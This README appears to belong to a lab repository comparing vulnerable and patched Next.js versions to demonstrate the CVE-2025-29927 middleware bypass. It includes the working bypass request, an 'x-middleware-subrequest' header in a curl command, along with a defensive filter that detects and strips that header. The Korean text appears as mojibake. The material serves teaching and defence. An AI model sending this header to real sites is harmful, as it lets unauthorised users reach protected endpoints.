# Next.js CVE-2025-29927 Middleware Vulnerability

์ด ๋ ˆํฌ์ง€ํ† ๋ฆฌ๋Š” Next.js 15.2.3 ๋ฒ„์ „๊ณผ Next.js 15.1.7 ๋ฒ„์ „์„ ์‚ฌ์šฉํ•˜์—ฌ CVE-2025-29927 ๋ฏธ๋“ค์›จ์–ด ์ทจ์•ฝ์ ์„ ๋น„๊ตํ•ด๋ณผ ์ˆ˜ ์žˆ๋Š” ๋ชจ๋…ธ๋ ˆํฌ ํ”„๋กœ์ ํŠธ์ž…๋‹ˆ๋‹ค.

## Vulnerability Description

CVE-2025-29927 is a security vulnerability in Next.js middleware that allows authentication middleware to be bypassed by sending the x-middleware-subrequest header.
This vulnerability affects the following versions:

- Next.js 15.x < 15.2.3
- Next.js 14.x < 14.2.25
- Next.js 13.x < 13.5.9

Each of these lines is fixed by updating to the corresponding patched version.

## How to Run

1. Clone the repository.
2. Install dependencies: `pnpm install`
3. Start the development servers: `pnpm dev`
4. Open each app:

- ํŒจ์น˜๋œ ๋ฒ„์ „ (15.2.3): http://localhost:3000
- ์ทจ์•ฝํ•œ ๋ฒ„์ „ (15.1.7): http://localhost:3001

5. Requesting the /api/protected endpoint without a token is denied on both apps.

```
$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}

$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
```

6. Supplying a valid token grants access to the protected endpoint on both apps.

```
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}

$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
```

7. ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ๋ฏธ๋“ค์›จ์–ด๋ฅผ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค.

```
$ curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}

$ curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}
```
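The header used in step 7 is internal to Next.js, so an external client has no legitimate reason to send it. The following is an added example, not code from this repository, of a defensive filter that an internet-facing proxy or Node.js front could apply before forwarding to Next.js: it flags the header, reports how many `middleware` segments it carries, and strips it. The `ip` and `path` values and the sample headers are constructed for illustration.

```javascript
// Added example, not code from this repository: a defensive filter for a
// proxy or Node.js front that sits in front of Next.js. The
// x-middleware-subrequest header is internal to Next.js, so a client
// sending it is an anomaly: log it, then strip it before forwarding.

const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Finds the header key regardless of casing (HTTP header names are
// case-insensitive); returns undefined when the header is absent.
function findSubrequestKey(headers) {
  return Object.keys(headers).find((k) => k.toLowerCase() === SUBREQUEST_HEADER);
}

// Describes an inbound request's headers. `depth` is the number of
// ':'-separated "middleware" segments, so the README's
// "middleware:middleware:middleware:middleware:middleware" gives 5.
function classifyRequest(headers) {
  const key = findSubrequestKey(headers);
  if (key === undefined) return { suspicious: false, depth: 0 };
  const segments = String(headers[key]).split(':').map((s) => s.trim());
  const depth = segments.filter((s) => s === 'middleware').length;
  return { suspicious: true, depth };
}

// Returns a copy of the headers with the internal header removed so the
// upstream Next.js app never receives a client-supplied value.
function stripSubrequestHeader(headers) {
  const key = findSubrequestKey(headers);
  if (key === undefined) return { ...headers };
  const { [key]: _dropped, ...rest } = headers;
  return rest;
}

// Builds a one-line log record for a SIEM, or null when nothing is wrong.
// `ip` and `path` are assumed to come from the proxy's request object.
function logBypassAttempt(ip, path, headers) {
  const { suspicious, depth } = classifyRequest(headers);
  if (!suspicious) return null;
  return `cve-2025-29927 header from ${ip} on ${path} depth=${depth}`;
}

// Constructed sample (not captured traffic): the header shape from step 7,
// sent with mixed casing to show that the lookup is case-insensitive.
const sampleHeaders = {
  host: 'localhost:3001',
  'X-Middleware-Subrequest': 'middleware:middleware:middleware:middleware:middleware',
};
```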

## ํ”„๋กœ์ ํŠธ ๊ตฌ์กฐ

```
nextjs-cve-2025-29927/
├── apps/
│   ├── next15_1_7/  # vulnerable version
│   └── next15_2_3/  # patched version
├── packages/
│   └── ui/          # shared UI components
└── README.md
```

## ์ฐธ๊ณ ๋งํฌ

- [Vercel blog](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)
- [DevStefanCho YouTube](https://www.youtube.com/watch?v=6PswGPu642Y&t=229s&ab_channel=DevStefanCho)
- https://hackyboiz.github.io/2025/03/27/bekim/2025-03-27/
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927